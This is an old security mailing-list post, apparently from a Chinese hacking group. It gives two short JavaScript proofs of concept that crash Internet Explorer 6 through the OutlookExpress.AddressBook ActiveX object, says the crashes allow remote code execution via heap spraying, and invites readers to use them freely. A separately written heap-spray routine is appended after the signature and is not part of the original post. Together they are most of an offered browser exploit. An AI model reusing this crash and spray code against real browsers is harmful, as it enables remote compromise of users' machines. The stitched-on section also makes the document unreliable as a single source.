It's been a while, and I got a bit rusty on the ol' browser hacks here and
there, mainly because of lack of time. That doesn't mean I didn't research some
browser issues behind the screen. One of them is the XBM image processing in
Firefox, and I found that I cannot exploit it [1]. Which is good for Firefox
users! Opera tends toward denial-of-service behavior on the XBM #define w/h header,
which might be worth investigating some day. Nevertheless, I reverted a
system to run solely Internet Explorer 6 to test some ideas a moment ago.
Therefore, I am not sure if these exploits run on MSIE 7 or later. In any
case, they crash MSIE 6 in such a way that remote code execution becomes
possible by controlling the heap with JavaScript, aka heap spraying. Since
there are a lot of heap-spraying code blocks available on many hacking
repositories I will not go into that; most of them are generic and can be
re-used with a few tweaks, think Milw0rm, or HDM's website.

OK, we are only crashing Internet Explorer 6 with the dreaded ActiveX
objects from Microsoft just to toy with the idea. There have been many
variations regarding the exploitation of ActiveX, and this is simply
another way of abusing them with the most minimal code. I simply wanted to
obtain a method of crashing Internet Explorer with little means, and this is
what the examples below do. And remember, not all crashes are exploitable,
but these generally are if you know what you are doing.

Anyway, have fun as long as it lasts! 

Some compact examples, probably more variations possible:

<script>
for(i=0;i<33;i++){
   try{
   // Instantiate the Outlook Express address book object and call an
   // Array method (concat) on it; MSIE 6 crashes on this call.
   foo = new ActiveXObject("OutlookExpress.AddressBook").concat('3'+'3'+'3');
   }catch(e){}
}
</script>

 

<script>
for(i=0;i<33;i++){
   try{
   // Same object, different Array method (join); MSIE 6 crashes here too.
   foo = new ActiveXObject("OutlookExpress.AddressBook").join(1,1,1);
   }catch(e){}
}
</script>



And do whatever thou wishest!

[1] http://mxr.mozilla.org/firefox/source/modules/libpr0n/decoders/xbm/nsXBMDecoder.cpp#254

[Ph4nt0m] <http://www.ph4nt0m.org/>
[Ph4nt0m Security Team] <http://blog.ph4nt0m.org/> [EMAIL PROTECTED]
Email:  [EMAIL PROTECTED]
PingMe: <http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=hanqin_wuhq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724>
=== V3ry G00d, V3ry Str0ng ===
=== Ultim4te H4cking ===
=== XPLOITZ ! ===
=== #_# ===
#If you are brave, there is nothing you cannot achieve.#
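The message above leaves the heap-spraying part to the reader. As an added example, not code from the original post, here is the chunk-layout arithmetic behind the classic IE6-era JavaScript heap spray that such a crash would be paired with: each sprayed string becomes one heap allocation made of a long sled followed by the payload, sized so that a hijacked pointer such as 0x0c0c0c0c lands inside the sled and slides forward into the payload. The payload here is a constructed placeholder (INT3 / 0xCC bytes), not shellcode, and the chunk size, per-string overhead and the alignment assumption in offsetInBlock are illustrative assumptions, not values taken from the post.

```javascript
// Added example (not from the original post): layout arithmetic of a classic
// IE6-era JavaScript heap spray. Constants below are assumptions for illustration.

const CHUNK_BYTES = 0x100000;   // 1 MiB per sprayed block (assumed spray size)
const STRING_OVERHEAD = 0x24;   // assumed per-string heap header/terminator bytes
const SLED_UNIT = "\u0c0c";     // bytes 0c 0c: 0x0c0c0c0c is both a sled byte
                                // pattern (or al,0x0c) and the address to land on

// Constructed placeholder payload: eight UTF-16 units of 0xCCCC (INT3 bytes).
// A real spray would put shellcode here; this is NOT shellcode.
const PAYLOAD = "\ucccc".repeat(8);

// Number of UTF-16 code units (2 bytes each) so that string body plus the
// assumed heap overhead fills exactly chunkBytes.
function unitsForChunk(chunkBytes, overheadBytes) {
  return (chunkBytes - overheadBytes) / 2;
}

// One spray block: sled first, payload last, sized to fill the chunk exactly,
// so consecutive blocks tile the heap with a predictable pattern.
function buildSprayChunk(payload, chunkBytes = CHUNK_BYTES, overheadBytes = STRING_OVERHEAD) {
  const totalUnits = unitsForChunk(chunkBytes, overheadBytes);
  const sledUnits = totalUnits - payload.length;
  if (sledUnits <= 0) throw new Error("payload does not fit in one chunk");
  return SLED_UNIT.repeat(sledUnits) + payload;
}

// Fill the heap with `count` blocks. Each block is rebuilt so the engine
// cannot share a single string object between array slots (the old IE sprays
// used .substr() for the same reason).
function spray(count, payload = PAYLOAD) {
  const blocks = new Array(count);
  for (let i = 0; i < count; i++) {
    blocks[i] = buildSprayChunk(payload);
  }
  return blocks;
}

// Byte offset of a target address inside a chunkBytes-sized block, assuming
// blocks are chunkBytes-aligned. Real heaps do not guarantee that alignment;
// the large sled is what makes the spray tolerant of the error.
function offsetInBlock(addr, chunkBytes = CHUNK_BYTES) {
  return addr % chunkBytes;
}

// Does execution starting at byteOffset within a block begin in the sled
// (true) or past it, inside or beyond the payload (false)?
function landsInSled(chunk, payload, byteOffset) {
  const sledBytes = (chunk.length - payload.length) * 2;
  return byteOffset >= 0 && byteOffset < sledBytes;
}

// Stand-alone demonstration: where would 0x0c0c0c0c land in a sprayed block?
function demo() {
  const chunk = buildSprayChunk(PAYLOAD);
  const target = 0x0c0c0c0c;
  const off = offsetInBlock(target);
  return {
    chunkUnits: chunk.length,
    chunkBytes: chunk.length * 2 + STRING_OVERHEAD,
    targetOffset: off,
    inSled: landsInSled(chunk, PAYLOAD, off),
  };
}
```

Run it under any JavaScript engine; with the assumed 1 MiB chunks the address 0x0c0c0c0c falls about 0xc0c0c bytes into a block, well inside the sled, which is why that address was the traditional pick for these sprays.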
